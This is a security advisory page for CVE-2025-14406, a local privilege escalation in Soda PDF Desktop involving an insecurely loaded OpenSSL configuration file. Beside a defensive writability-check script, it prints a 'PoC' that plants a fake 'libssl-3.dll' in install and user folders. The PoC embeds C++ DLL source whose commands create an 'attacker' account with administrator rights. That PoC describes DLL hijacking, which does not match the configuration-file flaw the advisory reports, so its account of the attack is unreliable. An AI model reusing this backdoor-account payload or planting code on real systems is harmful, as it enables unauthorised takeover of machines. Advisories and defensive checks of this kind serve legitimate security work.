Security Vulnerability Report
CVE-2025-14406 CVSS 7.8 HIGH

Published: 2025-12-23 22:15:47
Last Modified: 2026-01-21 20:58:52

Description

Soda PDF Desktop Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Soda PDF Desktop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-25793.
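A defender-side check for the condition described above, added here as an example and not taken from the advisory or the vendor: it reports whether the account running it can modify a configuration file, or create it where it does not yet exist. The advisory does not name the location, so the path is an operator-supplied argument and all function names are hypothetical.

```python
# Added example (not from the advisory): run as a standard, non-admin user.
import os
import sys
import tempfile
from pathlib import Path


def nearest_existing_dir(start: Path) -> Path:
    """Walk upward from `start` to the first directory that exists."""
    for candidate in [start, *start.parents]:
        if candidate.is_dir():
            return candidate
    return start  # nothing exists (e.g. missing drive); probes then fail safely


def can_create_in(directory: Path, as_dir: bool = False) -> bool:
    """Probe by really creating (then removing) an entry, so ACLs are honoured."""
    try:
        if as_dir:
            os.rmdir(tempfile.mkdtemp(dir=directory))
        else:
            with tempfile.TemporaryFile(dir=directory):
                pass
        return True
    except OSError:
        return False


def can_modify(file_path: Path) -> bool:
    """Open for append without writing, so the file's content is untouched."""
    try:
        os.close(os.open(file_path, os.O_WRONLY | os.O_APPEND))
        return True
    except OSError:
        return False


def audit_config_path(config_path: str) -> dict:
    """Classify a config path as 'writable', 'plantable' or 'ok' for this user."""
    path = Path(config_path)
    if path.is_file():
        checked, status = path.parent, "writable" if can_modify(path) else "ok"
    else:
        checked = nearest_existing_dir(path.parent)
        # Missing intermediate folders mean the user must be able to create one.
        plantable = can_create_in(checked, as_dir=(checked != path.parent))
        status = "plantable" if plantable else "ok"
    return {"path": str(path), "checked_dir": str(checked), "status": status}


if __name__ == "__main__":
    for arg in sys.argv[1:]:  # paths supplied by the operator
        print(audit_config_path(arg))
```

Any status other than `ok` for a path that a SYSTEM-level process reads means the directory ACLs need tightening or the product needs updating.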

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:* - VULNERABLE
Soda PDF Desktop < 14.x.x.x (specific version pending vendor confirmation)
Soda PDF Desktop (all versions that use the insecure OpenSSL configuration loading mechanism)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-14406 PoC - Soda PDF Desktop Uncontrolled Search Path Element
# This PoC demonstrates DLL hijacking via OpenSSL configuration
# Target: Soda PDF Desktop
# Privilege Escalation: Low privileged user -> SYSTEM
import os

# Target application details
TARGET_APP = "Soda PDF Desktop"
MALICIOUS_DLL = "libssl-3.dll"  # Common OpenSSL DLL name


def create_malicious_dll():
    """
    Create a malicious DLL that will execute payload when loaded.
    In a real attack, this would be a compiled DLL with the actual payload.
    For demonstration, we show the structure.
    """
    dll_code = '''
// Malicious DLL source code (C++)
// Compile with: g++ -shared -o libssl-3.dll malicious.cpp
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Execute payload with SYSTEM privileges
        // Example: Create a new user or execute reverse shell
        system("cmd.exe /c net user attacker P@ssw0rd123 /add");
        system("cmd.exe /c net localgroup Administrators attacker /add");
    }
    return TRUE;
}
'''
    return dll_code


def find_target_directory():
    r"""
    Find the Soda PDF Desktop installation directory.
    Common locations: C:\Program Files\Soda PDF\ or
    C:\Program Files (x86)\Soda PDF\
    """
    # A raw string cannot end in a backslash, so the trailing separator is omitted.
    possible_paths = [
        r"C:\Program Files\Soda PDF",
        r"C:\Program Files (x86)\Soda PDF",
        os.path.expanduser(r"~\AppData\Local\Programs\Soda PDF"),
    ]
    for path in possible_paths:
        if os.path.exists(path):
            return path
    return None


def plant_dll(target_dir):
    """
    Plant the malicious DLL in a location where Soda PDF will load it.
    The DLL search order will cause our DLL to be loaded before the legitimate one.
    """
    if not target_dir:
        print("[-] Target directory not found")
        return False

    malicious_path = os.path.join(target_dir, MALICIOUS_DLL)

    # Check if we can write to the target directory.
    # Only a placeholder text file is written here, not a compiled DLL.
    try:
        with open(malicious_path, 'w') as f:
            f.write("MALICIOUS_DLL_CONTENT")
        print(f"[+] Malicious DLL planted at: {malicious_path}")
        return True
    except PermissionError:
        print("[-] Permission denied. Try alternative locations in search path.")

    # Try user-writable directories in DLL search order
    user_dirs = [
        os.getcwd(),
        os.path.expanduser("~\\Documents"),
        os.path.expanduser("~\\Desktop"),
    ]
    for user_dir in user_dirs:
        try:
            malicious_path = os.path.join(user_dir, MALICIOUS_DLL)
            with open(malicious_path, 'w') as f:
                f.write("MALICIOUS_DLL_CONTENT")
            print(f"[+] Malicious DLL planted at: {malicious_path}")
            return True
        except OSError:
            continue
    return False


def main():
    print("=" * 60)
    print("CVE-2025-14406 PoC - Soda PDF Desktop DLL Hijacking")
    print("=" * 60)

    # Step 1: Find target installation
    print("\n[1] Searching for Soda PDF Desktop installation...")
    target_dir = find_target_directory()
    if target_dir:
        print(f"[+] Found installation at: {target_dir}")
    else:
        print("[-] Soda PDF Desktop not found. Please install it first.")
        return

    # Step 2: Plant malicious DLL
    print("\n[2] Planting malicious DLL...")
    if plant_dll(target_dir):
        print("[+] DLL successfully planted")
        print("[*] When Soda PDF Desktop starts, it will load the malicious DLL")
        print("[*] Payload will be executed with elevated privileges")
    else:
        print("[-] Failed to plant DLL")


if __name__ == "__main__":
    main()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14406", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:47.203", "lastModified": "2026-01-21T20:58:51.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soda PDF Desktop Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Soda PDF Desktop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-25793."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABC0E7B2-E242-4BD7-81E6-BA077750E564"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1079/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}